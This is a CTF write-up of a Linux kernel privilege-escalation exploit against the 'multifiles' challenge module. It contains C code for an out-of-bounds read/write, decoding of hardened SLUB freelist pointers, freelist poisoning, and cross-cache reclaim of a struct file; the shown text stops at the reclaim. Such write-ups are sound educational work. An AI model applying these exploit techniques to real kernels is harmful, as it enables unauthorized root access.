b01lers ctf 2026: kernel pwn (part 2)
Intro
Previously I wrote a writeup on the first kernel challenge from this CTF — if you haven’t read it yet, I recommend starting with Part 1.
This post covers multifiles, the second kernel pwn challenge.
Since I’m releasing this writeup a bit late: in Part 1, to cover all the steps required for exploitation, I reimplemented the exploit from scratch in Rust. This time around, given the delay, you’ll get a refactored version of the original exploit in C instead.
multifiles
Recon
1.
2├── build_out
3│ ├── bzImage
4│ ├── initrd.cpio.gz
5│ ├── kernel.config
6│ ├── multifiles.ko
7│ └── System.map
8├── deploy
9│ ├── docker-compose.prod.yml
10│ ├── docker-compose.yml
11│ ├── Dockerfile
12│ ├── Dockerfile_build
13│ └── wrapper.sh
14├── dev.sh
15├── pwn_build.sh
16├── README.md
17└── src
18 ├── drop_priv.c
19 ├── initrd_init
20 ├── kernel-cache-usercopy.diff
21 ├── kernel.config.fragment
22 ├── Makefile
23 └── multifiles.c
24
254 directories, 19 files
README.md
1# multifiles
2
3build artifacts in `build_out/`
4
5rebuild with `pwn_build.sh`
6
7run challenge with `dev.sh`
Based on deploy/wrapper.sh, I assembled a local run script:
1#!/bin/sh
2qemu-system-x86_64 \
3 -nodefaults -m 256M -nographic \
4 -kernel ~/multifiles/build_out/bzImage \
5 -initrd ~/multifiles/build_out/initrd.cpio.gz \
6 -append "console=ttyS0 loglevel=3 oops=panic panic=-1 pti=on kaslr" \
7 -cpu qemu64,+smep,+smap \
8 -smp 1 -no-reboot -serial stdio -monitor none
The VM boots successfully.
1[multifiles] booting challenge initrd
2==============================
3 multifiles kernel challenge
4==============================
5Device: /dev/multifiles
6Flag: /root/flag.txt (root only)
7User: ctf (uid=1000)
8==============================
9
10
11BusyBox v1.35.0 (Debian 1:1.35.0-4+b7) built-in shell (ash)
12Enter 'help' for a list of built-in commands.
13
14sh: can't access tty; job control turned off
15~ $
Read sources
1src
2├── drop_priv.c
3├── initrd_init
4├── kernel-cache-usercopy.diff
5├── kernel.config.fragment
6├── Makefile
7└── multifiles.c
drop_priv and initrd_init follow the same pattern as Part 1.
Here we have a target kernel module and a small patch to the kernel itself.
Let’s go through the interesting source files.
kernel-cache-usercopy.diff adds kmem_cache_copy_from_user / kmem_cache_copy_to_user — wrappers around copy_from/to_user that first verify the destination/source object belongs to a specific slab cache before performing the copy:
1+/**
2+ * kmem_cache_copy_from_user - Copy from userspace into an object from a cache
3+ * @cachep: The cache the destination object must belong to.
4+ * @to: Destination address in kernel memory.
5+ * @from: Source address in userspace.
6+ * @n: Number of bytes to copy.
7+ *
8+ * This wraps copy_from_user(), but first verifies that @to lives in a slab
9+ * belonging to @cachep. The subsequent copy_from_user() call performs the
10+ * normal hardened usercopy heap validation for the destination range.
11+ *
12+ * Return: number of bytes not copied, like copy_from_user().
13+ */
From kernel.config.fragment, note the slab configuration:
CONFIG_SLAB_FREELIST_HARDENED=y
CONFIG_SLAB_FREELIST_RANDOM=n
FREELIST_HARDENED encodes freelist pointers (next ^ secret ^ bswap64(slot_addr)), making them not trivially readable. FREELIST_RANDOM=n means the freelist order within a slab page is deterministic — useful for reliable object placement. If this is unfamiliar, this article is a good reference.
multifiles.c: the init and exit functions are standard boilerplate. The interesting part is the file_operations table:
1static const struct file_operations multifiles_fops = {
2 .owner = THIS_MODULE,
3 .open = multifiles_open,
4 .release = multifiles_release,
5 .read = multifiles_read,
6 .write = multifiles_write,
7 .llseek = multifiles_llseek,
8 .unlocked_ioctl = multifiles_ioctl,
9 #ifdef CONFIG_COMPAT
10 .compat_ioctl = multifiles_ioctl,
11 #endif
12};
Now the data structures the module operates on:
1#define TYPE_FILE 1
2
3// this should be the only flags needed. should not be leaked to userspace
4#define DEFAULT_FLAGS 0x7d333a7b66746362
5
6#define NAME_SIZE 16
7#define DATA_COUNT 16
8#define MAX_RW_SIZE 64
9
10typedef struct {
11 u64 type;
12 u64 flags;
13 char name[NAME_SIZE];
14 u64 data[DATA_COUNT];
15} MultiFile;
16
17#define NUM_SLOTS 67
18
19typedef struct {
20 struct mutex lock;
21 MultiFile *files[NUM_SLOTS];
22 u32 active_idx;
23} MultiFileList;
24
25typedef struct {
26 char name[16];
27} MultiFileCreateReq;
A few things to note from this:
MultiFileis0xa0bytes (0x10header oftype+flags+0x10name+0x80data). These are the objects allocated frommultifiles_cache, one perioctl(CREATE).- Each
open()allocates oneMultiFileList(stored infile->private_data), which holds up toNUM_SLOTS = 67MultiFilepointers infiles[]. So a single fd can keep up to 67 live objects, and the index returned byCREATEis just the slot in this per-fd array.active_idxselects which slotread/writeoperate on. DEFAULT_FLAGS = 0x7d333a7b66746362is set on every freshly createdMultiFile, and the source explicitly comments it should not be leaked to userspace. In ASCII that’sbctf{:3}— a deliberate canary. Note where it lives: offset0x08, inside thetype+flagsheader. As we’ll see, the cache’s usercopy region starts atname(0x10), so this header sits outside whatcopy_to/from_useris allowed to touch — which is exactly what stops us from leaking it directly.
Vulnerabilities
Looking at multifiles_read:
1 150 static ssize_t multifiles_read(struct file *self, char __user *buf, size_t count, loff_t *offset) {
2 151 MultiFileList *list = self->private_data;
3 152 ssize_t ret = 0;
4 153 if (list == NULL) {
5 154 return -EINVAL;
6 155 }
7 156
8 157 mutex_lock(&list->lock);
9 158
10 159 // check index is selected
11 160 MultiFile *multi_file = get_active_file(list);
12 161 if (multi_file == NULL) {
13 162 ret = -ENOENT;
14 163 goto out_unlock;
15 164 }
16 165
17 166 // check read bounds
18 167 if (
19 168 count > MAX_RW_SIZE
20 169 || (count % sizeof(u64)) != 0
21 170 || *offset >= sizeof(MultiFile)
22 171 || *offset < 0
23 172 ) {
24 173 ret = -EINVAL;
25 174 goto out_unlock;
26 175 }
27 176
28 177 loff_t old_offset = *offset;
29 178 *offset += count;
30 179
31 180 if (kmem_cache_copy_to_user(
32 181 multifiles_cache,
33 182 buf,
34 183 ((u8 *) &multi_file->data[0]) + old_offset,
35 184 count
36 185 ) != 0) {
37 186 ret = -EFAULT;
38 187 goto out_unlock;
39 188 }
40 189
41 190 ret = count;
42 191
43 192 out_unlock:
44 193 mutex_unlock(&list->lock);
45 194 return ret;
46 195 }
multifiles_write is similar.
The bounds check validates offset against sizeof(MultiFile) = 0xa0, but the actual copy base is &multi_file->data[0] + offset = obj+0x20+offset. So at offset=0x80 the copy starts at obj+0xa0 — exactly the first byte of the next adjacent slab object.
Now multifiles_llseek:
1 244 loff_t multifiles_llseek(struct file *self, loff_t offset, int whence) {
2 245 MultiFileList *list = self->private_data;
3 246 if (
4 247 list == NULL
5 248 // too lazy to support other types
6 249 || whence != SEEK_SET
7 250 || offset >= sizeof(MultiFile)
8 251 || offset < 0
9 252 ) {
10 253 return -EINVAL;
11 254 }
12 255
13 256 mutex_lock(&list->lock);
14 257 self->f_pos = offset;
15 258 mutex_unlock(&list->lock);
16 259
17 260 return offset;
18 261 }
llseek lets us set f_pos (the file position) to any value in [0, 0xa0). Combined with the mismatched copy base, this gives a controlled OOB window into the next adjacent slab object.
It’s worth being precise about why f_pos is the same thing as the loff_t *offset that multifiles_read/multifiles_write receive. When userspace calls read(fd, buf, n), the VFS path ksys_read() (in fs/read_write.c) does roughly:
1loff_t pos = file_pos_read(file); // copy of file->f_pos
2vfs_read(file, buf, n, &pos); // -> file->f_op->read(file, buf, n, &pos)
3file_pos_write(file, pos); // write the (advanced) position back
So the loff_t *offset argument handed to the driver is a pointer to a copy of file->f_pos, and after the op the kernel writes it back (which is why a normal read advances the position). multifiles_llseek sets file->f_pos directly. Net effect: lseek() followed by read()/write() lets us pick exactly where the driver’s copy starts — including the OOB window [0x80, 0x9f].
Further reading — VFS
f_pos/llseek:
- Linux kernel docs — VFS,
struct file_operations(thellseek/read/writecontracts)lseek(2)man page (userspace semantics,SEEK_SET)fs/read_write.con Bootlin Elixir — readksys_read,file_pos_read/file_pos_write,vfs_read,generic_file_llseekto see howf_posflows into*offset
Primitives
Controlled OOB read/write:
By setting f_pos via llseek to a value in [0x80, 0x9f], read()/write() will copy from/to obj+0x20+offset, which lands in the next adjacent slab object. Up to 64 bytes (MAX_RW_SIZE) per operation, 8-byte aligned (count % sizeof(u64) == 0).
Arbitrary position within object:
llseek allows resetting f_pos to any value in [0, 0x9f], giving full control over where within the object (or OOB window) the next read/write lands.
Multiple independent file descriptors:
Each open() on /dev/multifiles gets its own MultiFileList with its own 67 slots and its own f_pos. Objects in one fd’s list can be adjacent in the slab to objects from another fd’s list, enabling cross-fd OOB access.
Exploitation
Before diving in, here’s the whole plan:
- Validate the OOB. Confirm a slot can read its neighbor through the base-vs-bounds mismatch.
- Leak the heap. Decode
page_baseandcache_randomfrom encoded freelist words on a full slab page. - Forge a freelist pointer. With the secret known, poison a freed object’s
nextto a chosen address. - Find contiguous pages. Locate two physically adjacent slab pages
A,B == A+0x1000. - Build a page-end fake object. Poison
A’s tail so a fresh object lands atA+0xfc0and straddles intoB. - Cross-cache reclaim. Drain
Bback to the buddy allocator and let astruct filefor/bin/drop_privtake its place. - Patch and respawn. Flip the file’s
f_modewrite bits through the straddle,pwritethe binary, and let init rerun it as root.
Primitive validation
The exploit is built on a thin layer of wrappers over the driver ABI:
1int mf_open(void); // open("/dev/multifiles", O_RDWR)
2int mf_create(int fd, const char *name); // ioctl(CREATE) -> slot index
3void mf_set_active(int fd, uint32_t idx); // ioctl(SET_ACTIVE)
4void mf_delete(int fd, uint32_t idx); // ioctl(DELETE)
5// select idx, lseek(fpos, SEEK_SET), then read len bytes (len % 8 == 0, <= 64)
6void mf_read(int fd, uint32_t idx, off_t fpos, void *buf, size_t len);
Note mf_read folds set_active + lseek + read into one call, so fpos
is exactly the f_pos the driver will use as its copy offset.
For now let’s work within a single file descriptor and validate the OOB primitive.
1int main(void) {
2 int fd = mf_open();
3 int a0 = mf_create(fd, "a0");
4 int a1 = mf_create(fd, "a1");
5 int a2 = mf_create(fd, "a2");
6 printf("[*] created slots: a0=%d a1=%d a2=%d\n", a0, a1, a2);
7
8 printf("[*] press enter to set_active(%d)...\n", a0);
9 getchar();
10
11 mf_set_active(fd, a0);
12 printf("[*] active = %d\n", a0);
13
14 return 0;
15}
multifiles_set_active is static and gets inlined into multifiles_ioctl, so there is no standalone symbol to break on. Set a breakpoint at multifiles_ioctl (.text+0x2f0) and step into the SET_ACTIVE branch from the switch.
1gef> x/16gx $r12+0x20
20xffff8880038d7020: 0xffff888003989000 0xffff8880039890a0
30xffff8880038d7030: 0xffff888003989140 0x0000000000000000
40xffff8880038d7040: 0x0000000000000000 0x0000000000000000
50xffff8880038d7050: 0x0000000000000000 0x0000000000000000
60xffff8880038d7060: 0x0000000000000000 0x0000000000000000
70xffff8880038d7070: 0x0000000000000000 0x0000000000000000
80xffff8880038d7080: 0x0000000000000000 0x0000000000000000
90xffff8880038d7090: 0x0000000000000000 0x0000000000000000
10gef> telescope *(void**)($r12+0x20) -n
11 0xffff888003989000|+0x0000|+000: 0x0000000000000001
12 0xffff888003989008|+0x0008|+001: 0x7d333a7b66746362 'bctf{:3}a0'
13 0xffff888003989010|+0x0010|+002: 0x0000000000003061 ('a0'?)
14 0xffff888003989018|+0x0018|+003: 0x0000000000000000
15 0xffff888003989020|+0x0020|+004: 0x0000000000000000
16 0xffff888003989028|+0x0028|+005: 0x0000000000000000
17 0xffff888003989030|+0x0030|+006: 0x0000000000000000
18 0xffff888003989038|+0x0038|+007: 0x0000000000000000
19 0xffff888003989040|+0x0040|+008: 0x0000000000000000
20 0xffff888003989048|+0x0048|+009: 0x0000000000000000
21 0xffff888003989050|+0x0050|+010: 0x0000000000000000
22 0xffff888003989058|+0x0058|+011: 0x0000000000000000
23 0xffff888003989060|+0x0060|+012: 0x0000000000000000
24 0xffff888003989068|+0x0068|+013: 0x0000000000000000
25 0xffff888003989070|+0x0070|+014: 0x0000000000000000
26 0xffff888003989078|+0x0078|+015: 0x0000000000000000
27 0xffff888003989080|+0x0080|+016: 0x0000000000000000
28 0xffff888003989088|+0x0088|+017: 0x0000000000000000
29 0xffff888003989090|+0x0090|+018: 0x0000000000000000
30 0xffff888003989098|+0x0098|+019: 0x0000000000000000
31 0xffff8880039890a0|+0x00a0|+020: 0x0000000000000001
32 0xffff8880039890a8|+0x00a8|+021: 0x7d333a7b66746362 'bctf{:3}a1'
33 0xffff8880039890b0|+0x00b0|+022: 0x0000000000003161 ('a1'?)
34 0xffff8880039890b8|+0x00b8|+023: 0x0000000000000000
35 ...
36 0xffff888003989140|+0x0140|+040: 0x0000000000000001
37 0xffff888003989148|+0x0148|+041: 0x7d333a7b66746362 'bctf{:3}a2'
38 0xffff888003989150|+0x0150|+042: 0x0000000000003261 ('a2'?)
39 ...
Leaking the flag — and the hardened usercopy wall
The obvious first target is that bctf{:3} canary in flags. A freshly created neighbor has flags at offset 0x08, so let’s point the OOB read at the neighbor’s header: f_pos=0x80 makes the copy start at obj+0xa0 = the neighbor’s offset 0, which would put its flags in leak[1].
1uint8_t leak[0x40];
2mf_read(fd, a0, 0x80, leak, sizeof(leak)); // copy base obj+0xa0 = neighbor+0x00
3// neighbor flags would land at leak+0x08
4printf("[*] neighbor flags = 0x%llx\n", *(unsigned long long *)(leak + 8));
Running it instantly panics:
1[ 12.567074] usercopy: Kernel memory exposure attempt detected from SLUB object 'multifiles_cache' (offset 0, size 64)!
2[ 12.568138] ------------[ cut here ]------------
3[ 12.568300] kernel BUG at mm/usercopy.c:102!
4[ 12.569592] Oops: invalid opcode: 0000 [#1] PREEMPT SMP PTI
5[ 12.570619] CPU: 0 UID: 1000 PID: 54 Comm: w Tainted: G O 6.12.81-dirty #1
6[ 12.571082] Tainted: [O]=OOT_MODULE
7[ 12.571198] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.17.0-10.fc44 06/10/2025
8[ 12.571507] RIP: 0010:usercopy_abort+0x68/0x80
9[ 12.572341] Code: ac 51 48 c7 c2 48 b3 97 ac 41 52 48 c7 c7 58 2d 9c ac 48 0f 45 d6 48 c7 c6 45 09 96 ac 48 89 c1 49 0f 45 f3 e8 f9 27 e9 ff 90 <0f> 0b 49 c7 c1 f8 f4 99 ac 4d 89 ca 4d 89 c8 eb a7 0f 1f 80 00 00
10[ 12.572840] RSP: 0018:ffffb6d740173dd0 EFLAGS: 00010246
11[ 12.573072] RAX: 000000000000006a RBX: ffffa01ac19ba0a0 RCX: 00000000ffffdfff
12[ 12.573194] RDX: 0000000000000000 RSI: ffffb6d740173c88 RDI: 0000000000000001
13[ 12.573337] RBP: 0000000000000040 R08: 0000000000009ffb R09: 00000000ffffdfff
14[ 12.573559] R10: 00000000ffffdfff R11: ffffffffacc555e0 R12: 0000000000000001
15[ 12.573675] R13: ffffa01ac19ba0e0 R14: fffffffffffffff2 R15: ffffb6d740173f08
16[ 12.573815] FS: 0000000000409cb8(0000) GS:ffffa01acf800000(0000) knlGS:0000000000000000
17[ 12.573935] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
18[ 12.574026] CR2: 000000000040601a CR3: 00000000019a4000 CR4: 00000000003006f0
19[ 12.574242] Call Trace:
20[ 12.575178] <TASK>
21[ 12.575606] __check_heap_object+0x7d/0xa0
22[ 12.575858] __check_object_size+0x166/0x2b0
23[ 12.575983] kmem_cache_copy_to_user+0x85/0xe0
24[ 12.576196] multifiles_read+0xa6/0xc0 [multifiles]
25[ 12.576675] vfs_read+0xda/0x350
26[ 12.576795] ksys_read+0x6a/0xf0
27[ 12.576868] do_syscall_64+0x9e/0x1a0
28[ 12.577066] entry_SYSCALL_64_after_hwframe+0x77/0x7f
29[ 12.577338] RIP: 0033:0x4042b0
30[ 12.578697] </TASK>
31[ 12.578775] Modules linked in: multifiles(O)
32[ 12.579623] ---[ end trace 0000000000000000 ]---
33[ 12.581620] Kernel panic - not syncing: Fatal exception
34[ 12.582376] Kernel Offset: 0x2aa00000 from 0xffffffff81000000 (relocation range: 0xffffffff80000000-0xffffffffbfffffff)
This is hardened usercopy. Recall the cache is created with kmem_cache_create_usercopy(..., offsetof(MultiFile, name), USERCOPY_SIZE, ...) — useroffset 0x10, usersize 0x90. Only [obj+0x10, obj+0xa0) (name + data) is allowed to cross the user boundary. __check_object_size figures out which slab object our source pointer lands in (the neighbor) and checks the range against its usercopy region. Our copy started at neighbor+0x00, below 0x10, so it aborts — “offset 0, size 64”.
The takeaway is a hard constraint on the primitive: the OOB copy must start at neighbor+0x10 or later, i.e. f_pos >= 0x90. The header — type, flags, and (once the object is freed) the freelist pointer at offset 0 — is all unreachable this way. So the bctf{:3} canary cannot be leaked directly; it lives in the header precisely so hardened usercopy guards it.
Pointing the read at the neighbor’s name instead works cleanly (f_pos=0x90 → start obj+0xb0 = neighbor+0x10):
1// usercopy region is [name(0x10), 0xa0); copy must start at >= neighbor+0x10
2uint8_t leak[0x40];
3mf_read(fd, a0, 0x90, leak, sizeof(leak)); // copy base obj+0xb0 = neighbor->name
4printf("[*] neighbor name = 0x%llx ('%.16s')\n",
5 *(unsigned long long *)leak, (char *)leak);
1[*] neighbor name = 0x3161 ('a1')
0x3161 is "a1" — the name we gave the second object — confirming slot 0 and slot 1 are adjacent and the OOB read works. The primitive is validated, with the constraint baked in: we can only see [neighbor+0x10, neighbor+0xa0) (name + data).
Free the chunk
Let’s free the neighbor (mf_delete) and look at what SLUB leaves behind.
Dumping the freed object (shown here in gdb at its real address; everything in [0x10, 0xa0) is also reachable through our OOB read):
10xffff8880039980a0 +0x00: 0x0000000000000001 type (NOT cleared on free)
20xffff8880039980a8 +0x08: 0x7d333a7b66746362 bctf{:3} flags (NOT cleared)
30xffff8880039980b0 +0x10: 0x0000000000003161 "a1" name (NOT cleared)
40xffff8880039980b8 +0x18: 0x0000000000000000
50xffff8880039980c0 +0x20: 0x0000000000000000 data[0]
6 ...
70xffff8880039980f0 +0x50: 0x76bb00d4c7d73040 <-- freelist pointer
80xffff8880039980f8 +0x58: 0x0000000000000000
9 ...
100xffff888003998140 +0xa0: 0x0000000000000001 (next object's type)
Two things stand out.
First, SLUB does not zero an object on free — it only writes the freelist pointer. That’s why type, flags (bctf{:3}) and name (“a1”) survive untouched in the freed chunk.
Second, the freelist pointer sits at offset 0x50, not 0. That’s sizeof(MultiFile) / 2, the result of the “relocate freelist pointer to the middle of the object” hardening. Crucially 0x50 falls inside [0x10, 0xa0) — the usercopy region — so unlike the 0x00 header, we can both read and write the freelist pointer through the OOB primitive.
Why does the value (0x76bb00d4c7d73040) look like garbage? CONFIG_SLAB_FREELIST_HARDENED mangles it:
fp = next ^ s->random ^ bswap64(&slot)
where &slot is the address of the pointer itself (obj+0x50), next is the next free object in the list, and s->random is a per-cache secret. A single read is one equation with three unknowns — we can’t naively decode it, nor forge an arbitrary pointer to write back.
Reading it through the OOB primitive
The dump above is gdb at the object’s real address; in the exploit we only have read(). To pull neighbor+0x50 into a 64-byte copy window the copy has to start at or before it: f_pos=0x98 sets the base to obj+0xb8 = neighbor+0x18, and a 0x40-byte read spans neighbor[0x18, 0x58), so the encoded word at neighbor+0x50 lands at leak+0x38.
We also need the neighbor to actually be free — otherwise +0x50 is just zeroed data — and we want its next to be a value we can reason about. So allocate three adjacent objects and free the last two. SLUB’s per-cpu freelist is LIFO, so freeing b2 then b1 leaves b1->next == b2:
1int b0 = mf_create(fd, "b0");
2int b1 = mf_create(fd, "b1");
3int b2 = mf_create(fd, "b2");
4
5mf_delete(fd, b2); // free b2 first
6mf_delete(fd, b1); // then b1 -> b1->next == b2, freeptr written at b1+0x50
7
8uint8_t leak[0x40];
9mf_read(fd, b0, 0x98, leak, sizeof(leak)); // window b1[0x18, 0x58)
10
11uint64_t enc;
12memcpy(&enc, leak + 0x38, sizeof(enc)); // b1+0x50
13printf("[+] encoded freelist ptr @ b1+0x50 = 0x%016llx\n",
14 (unsigned long long)enc);
1[+] encoded freelist ptr @ b1+0x50 = 0x4b89a339485018db
That 0x4b89a339485018db is b2 ^ s->random ^ bswap64(b1+0x50) — kernel-controlled metadata, not the name bytes we picked. Reading (and writing) +0x50 is now a real code primitive, not just a gdb observation.
What the membership check rules out
Before building on the freelist pointer, look at the custom gate every copy goes through (kernel-cache-usercopy.diff):
1static bool kmem_cache_has_object(struct kmem_cache *cachep, const void *ptr) {
2 struct slab *slab = virt_to_slab(ptr);
3 return slab && slab->slab_cache == cachep;
4}
This is a per-slab-folio check: it resolves the page ptr lives in and requires slab->slab_cache == multifiles_cache. The consequence for a cross-cache plan: if we drain a multifiles slab page back to the buddy allocator and let another cache (say filp_cachep) reclaim it, that page’s slab_cache is no longer multifiles_cache, so any OOB read/write through multifiles_read/write fails the check. We cannot OOB-read a reclaimed struct file directly — the naive “cross-cache then read the foreign object” approach is dead on arrival.
So the workable primitive is the freelist pointer we can read and write at +0x50. The remaining problem is weaponizing it under the hardening: either leak s->random + a heap address, or use a poisoning trick that cancels both (page-relative deltas XOR out the page base and the secret). That’s the next step.
Decoding the freelist pointer
Primary source
The encoding lives in freelist_ptr_encode() in mm/slub.c (v6.12):
1static inline freeptr_t freelist_ptr_encode(const struct kmem_cache *s,
2 void *ptr, unsigned long ptr_addr)
3{
4 unsigned long encoded;
5#ifdef CONFIG_SLAB_FREELIST_HARDENED
6 encoded = (unsigned long)ptr ^ s->random ^ swab(ptr_addr);
7#else
8 encoded = (unsigned long)ptr;
9#endif
10 return (freeptr_t){.v = encoded};
11}
and set_freepointer() fixes ptr_addr to the storage slot itself:
1unsigned long freeptr_addr = (unsigned long)object + s->offset;
2*(freeptr_t *)freeptr_addr = freelist_ptr_encode(s, fp, freeptr_addr);
s->offset is 0x50 for our cache, swab on a 64-bit value is bswap64, so for an object at base O:
1E(O) = next(O) ^ s->random ^ bswap64(O + 0x50)
One word is one equation in three unknowns — next, s->random, and O (which hides the unknown page base). We kill two of them with two XOR cancellations.
Two cancellations
- XOR two words to cancel
random. It’s one per-cache constant, soE(A) ^ E(B)drops it. - Same-page bswap cancels the page base.
bswap64(a) ^ bswap64(b) = bswap64(a ^ b), and for two freeptr slots on the same 4K pagea ^ bis just the low-bits delta — the page base is identical in both and cancels. We don’t know the address, but we know the “distance”.
Layout
0x1000 / 0xa0 = 25 objects per page (0x60 tail padding). On a pristine page allocations climb by address, so O_i = page + i*0xa0. We use three of them:
O_20 = page+0xc80 slot page+0xcd0
O_22 = page+0xdc0 slot page+0xe10
O_24 = page+0xf00 slot page+0xf50 (last object on the page)
To read E(O_i) we OOB-read from its live left neighbor O_{i-1} (f_pos=0x98, word at leak+0x38), so we keep odd indices alive and free even ones. Fill the page completely, then free 24, 22, 20 in that order — the per-cpu freelist is LIFO and a full page starts with an empty freelist, so:
free 24: next(O_24) = NULL
free 22: next(O_22) = O_24
free 20: next(O_20) = O_22
Recovering page base and random
slot24 ^ slot22 = 0xf50 ^ 0xe10 = 0x140, and bswap64(0x140) = 0x4001000000000000. With e24/e22/e20 read from O_23/O_21/O_19:
1// e24 = NULL ^ R ^ bsw(page+0xf50)
2// e22 = O_24 ^ R ^ bsw(page+0xe10) (O_24 = page+0xf00)
3uint64_t O24 = e22 ^ e24 ^ 0x4001000000000000ULL; // R and page base both cancel
4uint64_t page = O24 - 0xf00;
5uint64_t random = e24 ^ bsw(page + 0xf50); // e24 = R ^ bsw(slot24)
6
7// cross-check: decode O_20 -> next must be O_22
8if ((e20 ^ random ^ bsw(page + 0xcd0)) != page + 0xdc0)
9 die("decode cross-check failed");
Running it:
1[~] decode
2[+] page_base = 0xffffa30441994000
3[+] cache_random = 0x0f2dff77be715bcc
page_base is 0x1000-aligned and lands in the direct map — but note it is not the textbook 0xffff8880...; this kernel has direct-map KASLR, which is exactly why we never hardcode a base and validate with the cross-check (next(O_20) == O_22) instead. With s->random in hand the encoding is fully invertible: we can decode any freelist word, and — more usefully — forge one as target ^ random ^ bswap64(&slot).
Practical note. The 25-object fill must land on a pristine page for
O_i = page + i*0xa0to hold, so in the exploitdecoderuns first on a dedicated fd, before any otherCREATE, and refills the three freed slots afterwards so the later stages start on a clean page.
Poisoning the freelist
With s->random and a heap base we can run the encoding backwards: to make slot S hold an encoded pointer to target, write target ^ random ^ bswap64(S). The plan is to overwrite a freed object’s +0x50 so the freelist leads to an address we picked — then two CREATEs hand it back as a fresh MultiFile.
Target. page + 0xfc0. A 0xa0 object placed there spans [page+0xfc0, page+0x1060) — the last 0x40 bytes of this page plus the first 0x60 of the next physical page. 0xfc0 sits in the page’s tail padding, and the object’s start is still on a multifiles page, so the membership check and hardened usercopy both stay happy. That straddle is what later becomes a cross-page primitive.
Where we poison. The freed object F has to be the current cpu-slab freelist head and at a known address. page0 from the leak fits both: right after decode it is full and still the cpu slab, and F = page + 12*0xa0 (slot 0x7d0) has a known address. Freeing it pushes it to the cpu freelist with F->next == NULL.
Writing +0x50. Same window as the read, other direction: from the live left neighbor F-1 at f_pos=0x98 the copy lands on F[0x18, 0x58), so we read it, splice the forged word in at leak+0x38, and write it back.
1uint32_t F = 12; // F = page + 12*0xa0
2uint64_t F_slot = page + 12*0xa0 + 0x50; // page+0x7d0
3uint64_t target = page + 0xfc0;
4
5mf_delete(fd, F); // F -> cpu freelist head, F->next == NULL
6
7uint64_t enc = target ^ random ^ bsw(F_slot); // forge
8mf_read (fd, F - 1, 0x98, leak, sizeof(leak));
9memcpy(leak + 0x38, &enc, 8);
10mf_write(fd, F - 1, 0x98, leak, sizeof(leak));
11
12// read it back and decode -> must equal target
13mf_read(fd, F - 1, 0x98, leak, sizeof(leak));
14memcpy(&enc, leak + 0x38, 8);
15uint64_t decoded = enc ^ random ^ bsw(F_slot);
1[~] poison
2[+] F+0x50 decodes to 0xffff896f419bafc0 (target 0xffff896f419bafc0)
The freelist now reads F -> page+0xfc0: the next CREATE pops F, and the one after pops page+0xfc0. We stop one step short of actually allocating it — popping page+0xfc0 sets the cpu freelist head to whatever garbage sits at *(page+0x1010), so doing it is a one-way door. Instead we re-encode NULL back into F+0x50 and consume F, leaving page0 full and the cache clean. The next step is to make sure that straddle reaches a page we actually own.
Finding contiguous pages
Allocating the fake object isn’t free: CREATE uses kmem_cache_zalloc, which zeroes 0xa0 bytes from page+0xfc0 — and 0x60 of those land in the next physical page. We then read and write that straddle window. So the page at page+0x1000 can’t be arbitrary kernel memory; it has to be a slab page we own, or we corrupt something random and (best case) panic. So before allocating anything at a page tail we first locate a pair of physically adjacent multifiles pages A, B with B == A + 0x1000.
cache_random makes this cheap. The base of any full page falls out of a single NULL-terminated freeptr: free the page’s last object (pos24, at base+0xf00) and its next becomes NULL, so the encoded word is just random ^ bswap64(base+0xf50). Read it through the live pos23 and invert:
1// free pos24 -> next == NULL; read its freeptr via the live pos23
2mf_delete(fds[last/PERFD], last%PERFD);
3mf_read (fds[prev/PERFD], prev%PERFD, 0x98, leak, sizeof(leak));
4memcpy(&enc, leak + 0x38, 8);
5uint64_t base = bsw(enc ^ random) - 0xf50; // pos24+0x50 = bsw(enc^random)
Right after decode/poison the cache holds nothing but the full page0, so a plain sequential spray lays down fresh pages page1, page2, … in allocation order — object gi sits at scan_page(gi/25) + (gi%25)*0xa0. We spray SCAN_PAGES of them, decode every base, and look for B == A + 0x1000:
1[~] root
2[+] A=0xffff9de3419c2000 B=0xffff9de3419c3000
The buddy allocator hands out order-0 pages from contiguous runs often enough that a few dozen are almost always enough to contain an adjacent pair. A is the page whose tail object we’ll poison; B is the page the fake object reaches into.
Allocating the fake object
There’s a snag: A is not the cpu slab. The buddy allocator handed pages out in ascending order, so by the time B exists A is already a deactivated full slab, and a plain CREATE won’t touch it. SLUB’s per-cpu partial list fixes that: freeing A’s tail object turns A partial, and once the current cpu slab runs dry the allocator pulls A back and starts handing out its objects again. So we free pos24, forge its next to A+0xfc0, and CREATE twice — the first pops pos24, the second pops A+0xfc0:
1mf_delete(fds[last/PERFD], last%PERFD); // free A's tail
2uint64_t enc = (A + 0xfc0) ^ random ^ bsw(A + 0xf50); // forge pos24->next
3mf_read (fds[prev/PERFD], prev%PERFD, 0x98, leak, sizeof(leak));
4memcpy(leak + 0x38, &enc, 8);
5mf_write(fds[prev/PERFD], prev%PERFD, 0x98, leak, sizeof(leak));
6
7mf_create(fds[last/PERFD], "reB"); // pops pos24
8int fake = mf_create(fake_store, "pad"); // pops A+0xfc0 -> the fake object
fake is a perfectly legal MultiFile whose body runs off the end of A. Its data starts at A+0xfe0, so data[4] is A+0x1000 = B+0 — the first object on the next page. There’s one rule for using it: the copy has to start on A, or the membership check trips. f_pos=0x1f puts the base at A+0xfff (the last byte of A) and spills the following 0x40 bytes into B, so every B field comes back at buf[1 + offset] — a one-byte shift we just carry around.
That’s the primitive: a controlled read/write into the physical page right after A. Now we make that page hold something worth corrupting.
Reclaiming B as a struct file
B is full of our MultiFiles. To hand its page to another cache we drain it back to the buddy allocator and lean on SLUB’s discard policy. With CONFIG_SLUB_CPU_PARTIAL the per-cpu partial list holds ~10 slabs and the node keeps min_partial = 5 empties; past that, freeing an empty slab discards its page to buddy. So we turn a batch of full pages into empties — 11 to warm the cpu-partial chain, then B plus 9 more to push the discard through:
1for (i = 0; i < WARMUP_EMPTY_PAGES; i++) free_full_page(fds, press[i]); // 11
2free_full_page(fds, bp); // B
3for (i = 0; i < TARGET_EMPTY_PAGES - 1; i++) free_full_page(fds, press[11+i]);// 9
Then we poison A’s tail and realize the fake object exactly as before — only now its body straddles into B’s freed physical page. Spraying open("/bin/drop_priv", O_RDONLY|O_NONBLOCK) makes filp_cachep reclaim that page; the first struct file lands at B+0, right under the fake object. After each open we read the straddle window (f_pos=0x1f, so B+x is at buf[1+x]) and test for the file: f_mode is READ|CAN_READ with no WRITE, f_op/f_mapping/f_inode look like kernel pointers, private_data == 0, and f_flags == O_NONBLOCK|O_LARGEFILE.
1[+] B reclaimed as /bin/drop_priv struct file after 188 opens
